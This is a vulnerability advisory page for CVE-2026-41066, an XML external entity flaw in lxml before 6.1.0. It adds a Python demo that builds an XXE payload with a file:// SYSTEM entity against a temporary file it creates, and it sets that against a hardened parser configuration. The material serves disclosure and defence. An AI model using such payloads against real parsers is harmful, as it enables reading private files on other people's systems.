
CVE-2026-41066

Improper Restriction of XML External Entity Reference (CWE-611)

Published: Apr 24, 2026 | Modified: Apr 27, 2026
Severity scores

CVSS 3.x (source: NVD): N/A
CVSS 2.x: no score listed
RedHat/V2: no score listed
RedHat/V3: 5.9 MODERATE (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
Ubuntu: MEDIUM

The Red Hat vector records a network-reachable, unauthenticated issue with high attack complexity and a confidentiality-only impact (C:H, I:N, A:N), which matches a local file read with no integrity or availability effect.

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, either of its two parsers in the default configuration (resolve_entities=True) allows untrusted XML input to read local files: an external entity declared in the document's DOCTYPE (for example with a SYSTEM identifier pointing at a file:// URI) is expanded into the parsed content. Setting the resolve_entities option explicitly to resolve_entities='internal' or resolve_entities=False disables the local file access. The vulnerability is fixed in 6.1.0.
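The following added example (not from the advisory or the lxml project) reproduces the issue against a file the script creates itself and shows the hardened parser configuration beside the default one. The entity name, file name and marker string are constructed for the demo. On an lxml release before 6.1.0 the default parser returns the file's contents as element text; on 6.1.0 or later it does not; a parser built with resolve_entities=False never expands the external entity on any version. The 'internal' value, which keeps internal entities while refusing external ones, is assumed here to be available in lxml 5.x and later.

```python
"""Local file read through an external entity in lxml (CVE-2026-41066 class of
issue) and the parser option that closes it. Added example, not project code."""
import tempfile
from pathlib import Path

from lxml import etree

# Constructed marker written to the sample "local file" the payload targets.
SECRET = "s3cr3t-marker-1234"


def xxe_payload(file_uri: str) -> bytes:
    """Classic XXE document: an external general entity whose SYSTEM identifier
    is a local file URI, referenced once in the document body."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        "<data>&xxe;</data>\n"
    ).encode()


def parse_text(payload: bytes, parser: etree.XMLParser) -> str:
    """Parse with the given parser and return all text content of the tree.
    A parse error is treated as 'nothing leaked'."""
    try:
        root = etree.fromstring(payload, parser)
    except etree.XMLSyntaxError:
        return ""
    return "".join(root.itertext())


def hardened_parser() -> etree.XMLParser:
    """Parser that never fetches external entities.

    resolve_entities=False leaves every entity reference unexpanded, so the
    SYSTEM entity is never loaded. If internal entities are required,
    resolve_entities="internal" (assumed available on lxml 5.x and later)
    expands those while still refusing external ones. no_network is already the
    default but is set explicitly to document the intent."""
    return etree.XMLParser(resolve_entities=False, no_network=True)


def demo() -> dict:
    """Create a secret file, feed a payload pointing at it to both parsers and
    report whether the secret shows up in the parsed text."""
    with tempfile.TemporaryDirectory() as d:
        secret_path = Path(d) / "secret.txt"
        secret_path.write_text(SECRET)
        payload = xxe_payload(secret_path.as_uri())
        # Default parser: resolve_entities=True before lxml 6.1.0.
        default_text = parse_text(payload, etree.XMLParser())
        hardened_text = parse_text(payload, hardened_parser())
    return {
        "lxml_version": etree.LXML_VERSION,
        "default_leaks": SECRET in default_text,
        "hardened_leaks": SECRET in hardened_text,
    }


if __name__ == "__main__":
    print(demo())
```

Run it against the lxml release actually deployed; `default_leaks` being True is the quickest confirmation that the installed version is affected, and auditing for `etree.XMLParser()` or `etree.fromstring()`/`etree.parse()` calls on untrusted input without an explicit parser is the corresponding code review check.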

Weakness

The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

Affected Software

Name    Vendor    Start Version        End Version
Lxml    Lxml      *                    6.1.0 (excluding)
Lxml    Ubuntu    esm-infra/xenial     *
Lxml    Ubuntu    questing             *
Lxml    Ubuntu    resolute             *
Lxml    Ubuntu    upstream             *
